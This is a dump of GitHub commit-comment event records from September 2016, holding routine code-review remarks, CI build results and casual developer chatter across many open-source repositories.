{"id":"4522880343","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18915730,"position":98,"line":1025,"path":"common/src/main/java/com/frostwire/bittorrent/BTEngine.java","commit_id":"cf57a06a7905860cc352290d8a64b7c2906c19e7","created_at":"2016-09-06T17:57:26Z","updated_at":"2016-09-06T17:57:26Z","body":"so all of this I suppose is now part of the parent (SessionManager) right?"}},"created_at":"2016-09-06T17:57:26Z"}
{"id":"4522883648","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18915735,"position":98,"line":1025,"path":"common/src/main/java/com/frostwire/bittorrent/BTEngine.java","commit_id":"cf57a06a7905860cc352290d8a64b7c2906c19e7","created_at":"2016-09-06T17:58:00Z","updated_at":"2016-09-06T17:58:00Z","body":"that's correct"}},"created_at":"2016-09-06T17:58:00Z"}
{"id":"4522883738","type":"CommitCommentEvent","actor":{"login":"IAMtheIAM"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18915736,"position":null,"line":null,"path":null,"commit_id":"27842808a6b0e371b4a4a841e77a88a06931688e","created_at":"2016-09-06T17:58:00Z","updated_at":"2016-09-06T17:58:00Z","body":"Why keep removing and adding webpack-dashboard four times now???"}},"created_at":"2016-09-06T17:58:00Z"}
{"id":"4522884710","type":"CommitCommentEvent","actor":{"login":"kschamplin19"},"repo":{"name":"Foo-Bear/bearserver"},"payload":{"comment":{"id":18915739,"position":null,"line":null,"path":null,"commit_id":"d4ba9745907d217eb411c87f6ee5fd8b1037dfc8","created_at":"2016-09-06T17:58:14Z","updated_at":"2016-09-06T17:58:14Z","body":"From now on I think we should switch to fork-dev-pull in order to prevent conflicts."}},"created_at":"2016-09-06T17:58:14Z"}
{"id":"4522886631","type":"CommitCommentEvent","actor":{"login":"ashanhol"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18915742,"position":null,"line":null,"path":null,"commit_id":"ad07353eec92c24b294056acb5dec91dbe783370","created_at":"2016-09-06T17:58:35Z","updated_at":"2016-09-06T17:58:35Z","body":"Issue #8 "}},"created_at":"2016-09-06T17:58:35Z"}
{"id":"4522891840","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"CyanogenMod/android_device_samsung_serrano-common"},"payload":{"comment":{"id":18915760,"position":null,"line":null,"path":null,"commit_id":"2d7db29707ed70e925be719ac3330fc7628d9ffa","created_at":"2016-09-06T17:59:37Z","updated_at":"2016-09-06T17:59:37Z","body":"Hmm, I don't remember. How do I find it? A simple ascii search didn't reveal anything."}},"created_at":"2016-09-06T17:59:37Z"}
{"id":"4522903741","type":"CommitCommentEvent","actor":{"login":"MaheshWinit"},"repo":{"name":"MaheshWinit/Hello_World"},"payload":{"comment":{"id":18915787,"position":null,"line":null,"path":null,"commit_id":"8bc12017bab632041a157936422130812363a1df","created_at":"2016-09-06T18:01:50Z","updated_at":"2016-09-06T18:01:50Z","body":"df"}},"created_at":"2016-09-06T18:01:50Z"}
{"id":"4522903747","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18915788,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T18:01:50Z","updated_at":"2016-09-06T18:01:50Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-06T18:01:50Z"}
{"id":"4522913357","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18915805,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-06T18:03:33Z","updated_at":"2016-09-06T18:03:33Z","body":"@laskoviymishka could you please create a proper feature request with your suggestion. Thanks."}},"created_at":"2016-09-06T18:03:33Z"}
{"id":"4522914419","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18915807,"position":5,"line":32,"path":"nixos/modules/system/boot/stage-2-init.sh","commit_id":"a7a08188bf650ababa36300a9a6f34169e2a73bf","created_at":"2016-09-06T18:03:47Z","updated_at":"2016-09-06T18:03:47Z","body":"@edolstra Do you think we can generalise this to `if [ -z \"$container\" ]`? That would avoid printing errors when running `libvirt-lxc` containers, for example. Or did you intentionally make this `systemd-nspawn`-specific?"}},"created_at":"2016-09-06T18:03:47Z"}
{"id":"4522923717","type":"CommitCommentEvent","actor":{"login":"vercotux"},"repo":{"name":"kartik-v/yii2-grid"},"payload":{"comment":{"id":18915836,"position":176,"line":178,"path":"EditableColumnAction.php","commit_id":"90ed322fa3e4c190f4fd378c133f99432835cf2b","created_at":"2016-09-06T18:05:33Z","updated_at":"2016-09-06T18:05:33Z","body":"Why was this changed? $formName is `''` by default, which will evaluate as `true` and end up with the 'editableException' in the next two rows."}},"created_at":"2016-09-06T18:05:33Z"}
{"id":"4522925055","type":"CommitCommentEvent","actor":{"login":"sagarbinod"},"repo":{"name":"sagarbinod/IEMGMT"},"payload":{"comment":{"id":18915842,"position":null,"line":null,"path":null,"commit_id":"39e4b4997f200b4a737701ffc1fe0b206bcbee8f","created_at":"2016-09-06T18:05:48Z","updated_at":"2016-09-06T18:05:48Z","body":"after adding .gitignore file"}},"created_at":"2016-09-06T18:05:48Z"}
{"id":"4522931899","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18915879,"position":8,"line":41,"path":"modules/system/boot/stage-2-init.sh","commit_id":"bfe46a653ba2f8ff9902128f485cbd87c49cbca7","created_at":"2016-09-06T18:07:04Z","updated_at":"2016-09-06T18:07:04Z","body":"@edolstra Do you think we can expand this to `[ ! -e /proc/1 ] || [ -n \"$container\" ]`? It seems `/proc/1` exists at least for `libvirt-lxc` containers, so in that case we don't get the early mounts (most notably `/run`)."}},"created_at":"2016-09-06T18:07:04Z"}
{"id":"4522934275","type":"CommitCommentEvent","actor":{"login":"jhamman"},"repo":{"name":"jhamman/xarray_paper"},"payload":{"comment":{"id":18915883,"position":38,"line":93,"path":"jors_xarray.tex","commit_id":"2494fc388d04252a0d96d98b54914ffcfbb652fd","created_at":"2016-09-06T18:07:29Z","updated_at":"2016-09-06T18:07:29Z","body":"I see.  I must have just misinterpreted this line then.  I thought we were saying Python's nd array was the most widely used data structure in scientific computing.  Maybe just reword the original sentence: \"... like those implemented in SciPy...\""}},"created_at":"2016-09-06T18:07:29Z"}
{"id":"4522935628","type":"CommitCommentEvent","actor":{"login":"StrangeZak"},"repo":{"name":"StrangeZak/Handmade-Math"},"payload":{"comment":{"id":18915887,"position":null,"line":null,"path":null,"commit_id":"eac00c2aa1a7ec1375f58cc121d1e7757ef4d080","created_at":"2016-09-06T18:07:44Z","updated_at":"2016-09-06T18:07:44Z","body":"Awesome thanks, ill update README.md then merge it"}},"created_at":"2016-09-06T18:07:44Z"}
{"id":"4522935910","type":"CommitCommentEvent","actor":{"login":"mythmon"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18915888,"position":248,"line":248,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-06T18:07:47Z","updated_at":"2016-09-06T18:07:47Z","body":"Nit: It turns out that binding this in the render function is bad for performance, since it creates a new function everytime, breaking any caching React does."}},"created_at":"2016-09-06T18:07:47Z"}
{"id":"4522936114","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":18915889,"position":null,"line":null,"path":null,"commit_id":"332b01dcc0d0ccb35b88583ebbd6625bb54ffc2f","created_at":"2016-09-06T18:07:50Z","updated_at":"2016-09-06T18:07:50Z","body":"R.I.P useless log line.\r\n\r\nI think we'll be saving almost enough space with that to fit a new fingerbank.log on the machines"}},"created_at":"2016-09-06T18:07:50Z"}
{"id":"4522939363","type":"CommitCommentEvent","actor":{"login":"TheGeorgia"},"repo":{"name":"GeorgiasPeaches/RandallCantNameRepos"},"payload":{"comment":{"id":18915897,"position":null,"line":null,"path":null,"commit_id":"799f9e6df27f49492960c779ca4d41aba8ab6c9c","created_at":"2016-09-06T18:08:28Z","updated_at":"2016-09-06T18:08:28Z","body":"happy birthda"}},"created_at":"2016-09-06T18:08:28Z"}
{"id":"4522941670","type":"CommitCommentEvent","actor":{"login":"rrisque"},"repo":{"name":"rrisque/gitgrub"},"payload":{"comment":{"id":18915900,"position":null,"line":null,"path":null,"commit_id":"dc76b853cc805c66043ccde5d2ab9f9fb2967334","created_at":"2016-09-06T18:08:56Z","updated_at":"2016-09-06T18:08:56Z","body":"acually is bootstrapping"}},"created_at":"2016-09-06T18:08:56Z"}
{"id":"4522943111","type":"CommitCommentEvent","actor":{"login":"eric-wieser"},"repo":{"name":"clade/PyDAQmx"},"payload":{"comment":{"id":18915905,"position":13,"line":16,"path":"PyDAQmx/DAQmxFunctions.py","commit_id":"b6679c901dc7d0d26074b3c70c3f221b68aae234","created_at":"2016-09-06T18:09:14Z","updated_at":"2016-09-06T18:09:14Z","body":"Your documentation says `message`, but the implementation uses `mess`. Would be better for both to use `message`, since `mess` is not a common acronym here"}},"created_at":"2016-09-06T18:09:14Z"}
{"id":"4522943476","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"G620S-HUAWEI/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":18915906,"position":null,"line":null,"path":null,"commit_id":"95df8a7d412947db89945b6deb8efdc8aa2d52b9","created_at":"2016-09-06T18:09:18Z","updated_at":"2016-09-06T18:09:18Z","body":"https://github.com/G620S-HUAWEI/android_kernel_huawei_msm8916/commit/c63b073eb72dbd75cfd2ed9e417878b48baad430"}},"created_at":"2016-09-06T18:09:18Z"}
{"id":"4522945364","type":"CommitCommentEvent","actor":{"login":"vincentstorme"},"repo":{"name":"hnlee/kata"},"payload":{"comment":{"id":18915913,"position":13,"line":5,"path":"bowlinggame/v01/bowling/src/bowling/core.clj","commit_id":"c8738c8fe02f8b080830148e1b52a3df14ed175d","created_at":"2016-09-06T18:09:42Z","updated_at":"2016-09-06T18:09:42Z","body":"👍 "}},"created_at":"2016-09-06T18:09:42Z"}
{"id":"4522946204","type":"CommitCommentEvent","actor":{"login":"eric-wieser"},"repo":{"name":"clade/PyDAQmx"},"payload":{"comment":{"id":18915915,"position":64,"line":63,"path":"PyDAQmx/DAQmxFunctions.py","commit_id":"b6679c901dc7d0d26074b3c70c3f221b68aae234","created_at":"2016-09-06T18:09:52Z","updated_at":"2016-09-06T18:09:52Z","body":"Is there a reason we use `DAQmxGetErrorString` but `DAQmxGetExtendedErrorInfo` above?"}},"created_at":"2016-09-06T18:09:52Z"}
{"id":"4522946792","type":"CommitCommentEvent","actor":{"login":"IAMtheIAM"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18915918,"position":22,"line":90,"path":"package.json","commit_id":"62ea7417ff107153a28d76026782ae23063b8eec","created_at":"2016-09-06T18:09:58Z","updated_at":"2016-09-06T18:09:58Z","body":"`angular2-hmr` was removed but the webpack config was not updated. It is still referenced at:\r\n\r\n    /**\r\n     * Plugin: NormalModuleReplacementPlugin\r\n     * Description: Replace resources that matches resourceRegExp with newResource\r\n     *\r\n     * See: http://webpack.github.io/docs/list-of-plugins.html#normalmodulereplacementplugin\r\n     */\r\n\r\n```\r\n    new NormalModuleReplacementPlugin(\r\n      /angular2-hmr/,\r\n      helpers.root('config/modules/angular2-hmr-prod.js')\r\n    ),\r\n```"}},"created_at":"2016-09-06T18:09:58Z"}
{"id":"4522948566","type":"CommitCommentEvent","actor":{"login":"vincentstorme"},"repo":{"name":"hnlee/kata"},"payload":{"comment":{"id":18915920,"position":15,"line":13,"path":"bowlinggame/v01/bowling/test/bowling/core_test.clj","commit_id":"c8738c8fe02f8b080830148e1b52a3df14ed175d","created_at":"2016-09-06T18:10:22Z","updated_at":"2016-09-06T18:10:22Z","body":"👍 "}},"created_at":"2016-09-06T18:10:22Z"}
{"id":"4522951206","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18915929,"position":30,"line":71,"path":"app/renderer/src/containers/ResultListContainer.js","commit_id":"2a6c9d2a24ca240671a7de5f4b5c322023f14396","created_at":"2016-09-06T18:10:51Z","updated_at":"2016-09-06T18:10:51Z","body":"The thing is that I thought (without even have tested it :P) that this was a typo and that this is supposed to be `this.c` only and the additional `.c` was by accident :)\r\n\r\nnvm "}},"created_at":"2016-09-06T18:10:51Z"}
{"id":"4522951466","type":"CommitCommentEvent","actor":{"login":"nuss"},"repo":{"name":"supercollider/supercollider"},"payload":{"comment":{"id":18915930,"position":4,"line":247,"path":"HelpSource/Classes/Ndef.schelp","commit_id":"b30639489fb2f01c0f427dd8f3c668af7c8db3b1","created_at":"2016-09-06T18:10:55Z","updated_at":"2016-09-06T18:10:55Z","body":"The following example uses a buffer declared in `b` but that variable is nowhere initialized in the helpfile. That's confusing."}},"created_at":"2016-09-06T18:10:55Z"}
{"id":"4522964762","type":"CommitCommentEvent","actor":{"login":"eric-wieser"},"repo":{"name":"clade/PyDAQmx"},"payload":{"comment":{"id":18915948,"position":60,"line":60,"path":"PyDAQmx/DAQmxFunctions.py","commit_id":"b6679c901dc7d0d26074b3c70c3f221b68aae234","created_at":"2016-09-06T18:13:20Z","updated_at":"2016-09-06T18:13:20Z","body":"Might be good to not raise a `KeyError` if for some reason the DAQmx API returns a garbage error code"}},"created_at":"2016-09-06T18:13:20Z"}
{"id":"4522965046","type":"CommitCommentEvent","actor":{"login":"gruenich"},"repo":{"name":"doxygen/doxygen"},"payload":{"comment":{"id":18915949,"position":null,"line":null,"path":null,"commit_id":"10256be351f8f00ba5986750a08df1108bf6a4f7","created_at":"2016-09-06T18:13:23Z","updated_at":"2016-09-06T18:13:23Z","body":"This commit reverted my two last commits to this file. Probably the merge conflict was wrongly resolved. Can you handle this our should I rebase my commits and open a pull-request?"}},"created_at":"2016-09-06T18:13:23Z"}
{"id":"4522966155","type":"CommitCommentEvent","actor":{"login":"mythmon"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18915951,"position":228,"line":228,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-06T18:13:34Z","updated_at":"2016-09-06T18:13:34Z","body":"One problem with this is it doesn't allow you to have data in the textfield that isn't a valid number, which is a weird user experience. I'd think it would be better to have the form state be strings, and convert it at the last moment."}},"created_at":"2016-09-06T18:13:34Z"}
{"id":"4522967384","type":"CommitCommentEvent","actor":{"login":"nuss"},"repo":{"name":"supercollider/supercollider"},"payload":{"comment":{"id":18915955,"position":41,"line":283,"path":"HelpSource/Classes/Ndef.schelp","commit_id":"b30639489fb2f01c0f427dd8f3c668af7c8db3b1","created_at":"2016-09-06T18:13:47Z","updated_at":"2016-09-06T18:13:47Z","body":"The method `addSpec` doesn't seem to be part of the standard classlib. I guess it comes from the JITLibExtensions quark. I think an example like this one should rather go to the quarks' helpfile, not here."}},"created_at":"2016-09-06T18:13:47Z"}
{"id":"4522969709","type":"CommitCommentEvent","actor":{"login":"n3wt0nSAN"},"repo":{"name":"INNoWay/EditorMm"},"payload":{"comment":{"id":18915958,"position":2350,"line":2212,"path":"EditorMm/js/jquerymodal.js","commit_id":"a80fc97124d236742a4cd5af0ecac34ee5d8cef7","created_at":"2016-09-06T18:14:14Z","updated_at":"2016-09-06T18:14:14Z","body":"Modificações feitas somentes foram esta função \"drawGrid\""}},"created_at":"2016-09-06T18:14:14Z"}
{"id":"4522972646","type":"CommitCommentEvent","actor":{"login":"tameeshB"},"repo":{"name":"Awesalot/start"},"payload":{"comment":{"id":18915965,"position":null,"line":null,"path":null,"commit_id":"ce6b1eb98705157a53ad70c65c983263bc92eeaf","created_at":"2016-09-06T18:14:44Z","updated_at":"2016-09-06T18:14:44Z","body":"Cool, man! "}},"created_at":"2016-09-06T18:14:44Z"}
{"id":"4522972931","type":"CommitCommentEvent","actor":{"login":"CollinCraig"},"repo":{"name":"GeorgiasPeaches/RandallCantNameRepos"},"payload":{"comment":{"id":18915966,"position":null,"line":null,"path":null,"commit_id":"50acb9e6261014aca199feba37ecfb7dd6642489","created_at":"2016-09-06T18:14:48Z","updated_at":"2016-09-06T18:14:48Z","body":"lit"}},"created_at":"2016-09-06T18:14:48Z"}
{"id":"4522975827","type":"CommitCommentEvent","actor":{"login":"nuss"},"repo":{"name":"supercollider/supercollider"},"payload":{"comment":{"id":18915974,"position":75,"line":317,"path":"HelpSource/Classes/Ndef.schelp","commit_id":"b30639489fb2f01c0f427dd8f3c668af7c8db3b1","created_at":"2016-09-06T18:15:19Z","updated_at":"2016-09-06T18:15:19Z","body":"`addPar` isn't part of the standard classlib either."}},"created_at":"2016-09-06T18:15:19Z"}
{"id":"4522981600","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18915984,"position":null,"line":null,"path":null,"commit_id":"43b148c1f2c3f1d512304c9cc783e6154d901970","created_at":"2016-09-06T18:16:23Z","updated_at":"2016-09-06T18:16:23Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n- [docs/security](https://slashzerop-static-docs.pantheonsite.io/docs/security)\n"}},"created_at":"2016-09-06T18:16:23Z"}
{"id":"4522983911","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18915988,"position":269,"line":459,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-06T18:16:48Z","updated_at":"2016-09-06T18:16:48Z","body":"There's still some discussion about exactly what this value represents and how it will be used. I think it's likely that it will be used for sync with Video streams or similar in the future. As such, something like frameId isn't really appropriate. (Could be used internally.) We also know that the browser can always return the timestamp that the pose was queried at, so it feels like it's the most broadly applicable value to return here."}},"created_at":"2016-09-06T18:16:48Z"}
{"id":"4522984545","type":"CommitCommentEvent","actor":{"login":"kincaidoneil"},"repo":{"name":"Foo-Bear/bearserver"},"payload":{"comment":{"id":18915989,"position":null,"line":null,"path":null,"commit_id":"d4ba9745907d217eb411c87f6ee5fd8b1037dfc8","created_at":"2016-09-06T18:16:55Z","updated_at":"2016-09-06T18:16:55Z","body":"Sounds good...sorry about that.\n\nOn Tue, Sep 6, 2016 at 12:58 PM Saji Champlin <notifications@github.com>\nwrote:\n\n> From now on I think we should switch to fork-dev-pull in order to prevent\n> conflicts.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Foo-Bear/bearserver/commit/d4ba9745907d217eb411c87f6ee5fd8b1037dfc8#commitcomment-18915739>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGIxpqPXrL-bOC1W7f0dCFUoXXkC_Pocks5qnam2gaJpZM4J2HG3>\n> .\n>\n"}},"created_at":"2016-09-06T18:16:55Z"}
{"id":"4522987952","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18915996,"position":null,"line":null,"path":null,"commit_id":"ee886aca0690a24401e037851c28a6e042b072e2","created_at":"2016-09-06T18:17:32Z","updated_at":"2016-09-06T18:17:32Z","body":"This is not the right place to post comments like that. Please open a new issue in the issue tracker https://github.com/EionRobb/funyahoo-plusplus/issues/new"}},"created_at":"2016-09-06T18:17:32Z"}
{"id":"4522989650","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18915997,"position":13,"line":288,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:17:52Z","updated_at":"2016-09-06T18:17:52Z","body":"These comments make no sense they were removed from latest code base as well, can you remove them."}},"created_at":"2016-09-06T18:17:52Z"}
{"id":"4522990270","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18916000,"position":25,"line":300,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:18:00Z","updated_at":"2016-09-06T18:18:00Z","body":"same"}},"created_at":"2016-09-06T18:18:00Z"}
{"id":"4522990814","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18916003,"position":35,"line":315,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:18:07Z","updated_at":"2016-09-06T18:18:07Z","body":"same"}},"created_at":"2016-09-06T18:18:07Z"}
{"id":"4522991427","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18916005,"position":45,"line":364,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:18:13Z","updated_at":"2016-09-06T18:18:13Z","body":"same"}},"created_at":"2016-09-06T18:18:13Z"}
{"id":"4522991909","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18916007,"position":355,"line":714,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-06T18:18:17Z","updated_at":"2016-09-06T18:18:17Z","body":"I'll take another pass over this section. Agreed that we don't want to talk ourselves into an unimplementable corner."}},"created_at":"2016-09-06T18:18:17Z"}
{"id":"4522992137","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18916008,"position":57,"line":376,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:18:20Z","updated_at":"2016-09-06T18:18:20Z","body":"same"}},"created_at":"2016-09-06T18:18:20Z"}
{"id":"4522992747","type":"CommitCommentEvent","actor":{"login":"msagheer"},"repo":{"name":"plumgrid/libnetwork-plugin"},"payload":{"comment":{"id":18916012,"position":67,"line":390,"path":"plugin/driver/driver.go","commit_id":"746a6438954dca5129cb90405a631583f4bbd87f","created_at":"2016-09-06T18:18:28Z","updated_at":"2016-09-06T18:18:28Z","body":"same"}},"created_at":"2016-09-06T18:18:28Z"}
{"id":"4522997184","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18916020,"position":null,"line":null,"path":null,"commit_id":"b9b8b3e6790c8ddb1667c7db62dfc1de7666d759","created_at":"2016-09-06T18:19:17Z","updated_at":"2016-09-06T18:19:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KGa3hoyF&#x2F;3-add-complexity-report-task-to-npm-scripts\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add complexity report task to npm scripts</a>"}},"created_at":"2016-09-06T18:19:17Z"}
{"id":"4523007425","type":"CommitCommentEvent","actor":{"login":"Saify"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":18916041,"position":null,"line":null,"path":null,"commit_id":"6b36e266c6dc47ccb2746a649f9ac13123673d09","created_at":"2016-09-06T18:21:10Z","updated_at":"2016-09-06T18:21:10Z","body":"This in fact has broken the functionality of one of the components. These components used to work before but not now. The reason is _colCount is marked package scoped and it is not accessible in ERXTable anymore. See stacktrace:\r\n\r\n`Caused by: java.lang.IllegalAccessError: tried to access field com.webobjects.woextensions.WOTable._colCount from class er.extensions.components.ERXTable\r\n\tat er.extensions.components.ERXTable.colCount(ERXTable.java:90)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:497)\r\n\tat com.webobjects.foundation.NSKeyValueCoding$ValueAccessor$1.methodValue(NSKeyValueCoding.java:636)\r\n\tat com.webobjects.foundation.NSKeyValueCoding$_MethodBinding.valueInObject(NSKeyValueCoding.java:1134)\r\n\t... 79 more`\r\n\r\nHere is bytecode of both the files:\r\n\r\nWonder's WOTable:\r\n\r\n`public class er.extensions.woextensions.WOTable extends com.webobjects.appserver.WOComponent {\r\n  public com.webobjects.foundation.NSArray _list;\r\n  public int _maxColumns;\r\n  public int currentRow;\r\n  public int currentCol;\r\n  public int _rowCount;\r\n  **public int _colCount;**\r\n  public int currentItemIndex;\r\n  public er.extensions.woextensions.WOTable(com.webobjects.appserver.WOContext);\r\n  public boolean isStateless();\r\n  public com.webobjects.foundation.NSArray list();\r\n  public int maxColumns();\r\n  public int rowCount();\r\n  public int colCount();\r\n  public void setCurrentRow(int);\r\n  public void pushItem();\r\n  public void setCurrentCol(int);\r\n  protected void _resetInternalCaches();\r\n  public void takeValuesFromRequest(com.webobjects.appserver.WORequest, com.webobjects.appserver.WOContext);\r\n  public void reset();\r\n}`\r\n\r\nWebObjects WOTable:\r\n\r\n`public class com.webobjects.woextensions.WOTable extends com.webobjects.appserver.WOComponent {\r\n  com.webobjects.foundation.NSArray _list;\r\n  int _maxColumns;\r\n  public int currentRow;\r\n  public int currentCol;\r\n  int _rowCount;\r\n  **int _colCount;**\r\n  public com.webobjects.woextensions.WOTable(com.webobjects.appserver.WOContext);\r\n  public boolean isStateless();\r\n  public com.webobjects.foundation.NSArray list();\r\n  public int maxColumns();\r\n  public int rowCount();\r\n  public int colCount();\r\n  public void setCurrentRow(java.lang.Number);\r\n  public void pushItem();\r\n  public void setCurrentCol(java.lang.Number);\r\n  protected void _resetInternalCaches();\r\n  public void takeValuesFromRequest(com.webobjects.appserver.WORequest, com.webobjects.appserver.WOContext);\r\n  public void reset();\r\n}`"}},"created_at":"2016-09-06T18:21:10Z"}
{"id":"4523012424","type":"CommitCommentEvent","actor":{"login":"LorDClockaN"},"repo":{"name":"AICP/packages_apps_LockClock"},"payload":{"comment":{"id":18916051,"position":null,"line":null,"path":null,"commit_id":"567cbc5958abf4e6940bfe97d9955ce60fb88933","created_at":"2016-09-06T18:22:07Z","updated_at":"2016-09-06T18:22:07Z","body":"you sholdn't be concerned about warnings, they are all over the place\r\n\r\nbut that error doesn't have anything to do with LockClock\r\n\r\n\r\nIt's compiling fine for me\r\n\r\nTry to search the log for \"error:\" and then see what is erroring"}},"created_at":"2016-09-06T18:22:07Z"}
{"id":"4523013633","type":"CommitCommentEvent","actor":{"login":"devkdepy"},"repo":{"name":"KaOS-Community-Packages/vstudio"},"payload":{"comment":{"id":18916056,"position":null,"line":null,"path":null,"commit_id":"dd853ad5b9de3ff7fe7832a45eca39572e86be97","created_at":"2016-09-06T18:22:20Z","updated_at":"2016-09-06T18:22:20Z","body":"\r\nI downloaded a new package vstudio and checked his md5, which is:\r\nmd5sum vstudio_x64_6_lin.deb\r\nf1a74aba4f6dbc87a4bb884aba96fcc5 vstudio_x64_6_lin.deb\r\n\r\nSo I created the fork of vstudio project and changed the md5 to pass validation it worth?\r\n\r\nhttps://github.com/devkdepy/vstudio/commit/7be6951ddce9643788645be98a17c5a6edce9598"}},"created_at":"2016-09-06T18:22:20Z"}
{"id":"4523014187","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18916057,"position":null,"line":null,"path":null,"commit_id":"d9c76736cc6e3b8e9a7dc06bf824d06a22a6a699","created_at":"2016-09-06T18:22:26Z","updated_at":"2016-09-06T18:22:26Z","body":">Ah, was it the 'rec' keyword that caused the conflict? I couldn't understand why it failed. Thanks for the rapid fix.\n\nTechnically, I hoped that I was a level lower and that should have\nhelped. Also, when I did specify the platforms (octaveFull) it did work\neven before the fix (I did some testing, just not the correct one).\n\nWell, I decided to check the most annoying theory first, and it worked…\n\nThanks for the catch.\n\n\n\n"}},"created_at":"2016-09-06T18:22:26Z"}
